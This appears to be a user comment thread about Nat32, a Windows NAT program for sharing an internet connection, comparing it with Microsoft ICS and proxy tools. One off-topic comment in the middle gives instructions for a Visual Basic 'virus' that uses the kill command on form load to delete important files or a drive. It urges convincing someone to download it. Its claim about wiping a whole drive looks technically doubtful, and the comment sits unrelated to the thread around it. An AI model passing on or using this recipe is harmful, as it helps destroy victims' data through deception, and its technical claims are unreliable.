i haven't tried Nat32X, but I did use "Nat32". Very nice little app. Not quite as pretty as winroute, but blows away sygate or any proxy app.

This is a software router. The technique it uses to connect is NAT, but it "routes" all traffic to the IP address of the internet connection. DSL/Cable routers do the same thing, they're just hardware based.

All well & good but it's not a router, it's a Network Address Translator (hence NAT being in it's name.)

I used this program in the past and various others like it. It is great for those who do not know or want to learna version of linux. Who are not runnning 2000..
Just want something simple to setup that works well.. and gives them more powerful control in the long run.

With ICS is doesnt let you run a server (of any type) if you arent on the machine with the modem. With this NAT program it makes it simpler to do such a thing as this rather than spending a lot of time setting up WIN2k. For me this is a usefull program because the machine with the modem uses at present and ICS system to share the net. Finally I can get onto my ftp server from work :-)

this is trash. i got win2k pro running win2k and i got RH6 and RH7 as well as an IMAC and win95 and 98's machine work with no prob. nat32 is a joke.the ics dhcp server works even in dos!!!

just learn to love microsoft :)

ICS is a great program for OS's that have it installed like Win98 and Windows 2000 but if a person has Windows NT 4.0 Wk Station or Server this program is the best.

For those who like myself are running other platforms behind their NT/2000 server, this product is great. I've got Linux, MacOS and Amiga routing to the net. No clients required, no reconfiguring of apps. Good stuff.

The coding of this virii is very small. It is only one line. It is not complicated, and it is not smart at all. I bet you were hoping for a virus that all you do is send in the mail and when the mail is opened the person is infected. Well, sorry, you're not going to get that. Because of the small amount of coding, this virus isn't very smart, but, if you can find someone stupid enough to download it, or, you are very good at convincing someone to download it, then it will be very effective. You must have Visual Basic loaded. In form1.form, in the "form_load procedure, type: "kill c" (without the quotes). What this will do is, when the form is loaded a command will be given to kill the "c" drive. You can substitute "c" with any directory. For example, you can put in "d". Or you can get more specific like C:\windows\logo.sys. All you have to do is find a file that you know is important to a computer and put it after kill. It is simple but very effective.

So? With Build-in Internet Connection Sharing who needs apps. like this?. I got rid of Winproxy (Osotis) and used ICS with Win2000. And it works!
